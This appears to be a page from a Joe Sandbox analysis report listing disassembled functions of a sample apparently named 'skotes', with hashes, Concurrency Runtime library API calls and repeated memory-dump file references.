                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pExecutionResource
                                                                                                                                                                                                                                          • API String ID: 1772865662-359481074
                                                                                                                                                                                                                                          • Opcode ID: e949cd9c9bd0bdd37cef7e598f6c496d762d2a944b61f0e4a44b0b6e2b34def3
                                                                                                                                                                                                                                          • Instruction ID: 5d1a926c10ea921c82c33f1bc51f31851c27150e873bb589d27adc05367183c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e949cd9c9bd0bdd37cef7e598f6c496d762d2a944b61f0e4a44b0b6e2b34def3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF2193B5A402059BCB48EF94C882BFEB7A7BF49310F11401DE501AB782DBB0EE45CB95
                                                                                                                                                                                                                                          Function 006B4EA2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006B4F24
                                                                                                                                                                                                                                          • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 006B4F66
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                                                          • API String ID: 2663199487-3650809737
                                                                                                                                                                                                                                          • Opcode ID: e030d175b8756f21ca384768579908702a58e782584d6c076fad25d22cd31bcc
                                                                                                                                                                                                                                          • Instruction ID: 961f9f10ecd6b7be9ae07b168e3e4d6189a714befa8ab06caffe15cb19bb9e27
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e030d175b8756f21ca384768579908702a58e782584d6c076fad25d22cd31bcc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D21BA74600215EFCB44EFA8C892EAE77A6BF49310F00406DF5069B692DF71EE42CB55
                                                                                                                                                                                                                                          Function 006BB975 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006BBA0E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                                                                                          • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                                                                                                                                          • API String ID: 348560076-3997890769
                                                                                                                                                                                                                                          • Opcode ID: 26669a1af991a1aad2cb726dc8743e80ae07cb158b653e827ec82505a85e3a1c
                                                                                                                                                                                                                                          • Instruction ID: 59b1b9aabf715c15df60414f1cbe502cc8cbe24de86a9574d12c81fee0b8e49a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26669a1af991a1aad2cb726dc8743e80ae07cb158b653e827ec82505a85e3a1c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC01D6B0A823656AD71077B65C0DBFB399E9F06704F603429B640F6282EF75C8418BA5
                                                                                                                                                                                                                                          Function 006B6E1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SafeRWList.LIBCONCRT ref: 006B6E73
                                                                                                                                                                                                                                            • Part of subcall function 006B4E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 006B4E7F
                                                                                                                                                                                                                                            • Part of subcall function 006B4E6E: List.LIBCMT ref: 006B4E89
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006B6E85
                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006B6EAA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: eventObject
                                                                                                                                                                                                                                          • API String ID: 1288476792-1680012138
                                                                                                                                                                                                                                          • Opcode ID: 0c0af11d9504f29978549dfc3243d1895ab71510ae9a447c5cb9fea20b5b3b1e
                                                                                                                                                                                                                                          • Instruction ID: 9ecaab4c82de4574923f5f5a33c1076ade188d531bae64704fbab1f54f804a47
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c0af11d9504f29978549dfc3243d1895ab71510ae9a447c5cb9fea20b5b3b1e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D81102B5942304E6CB24EAA4CC8AFFE73696F05314F604128B504A61C2DB34DE45C765
                                                                                                                                                                                                                                          Function 006BA0EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 006BA102
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 006BA126
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006BA139
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
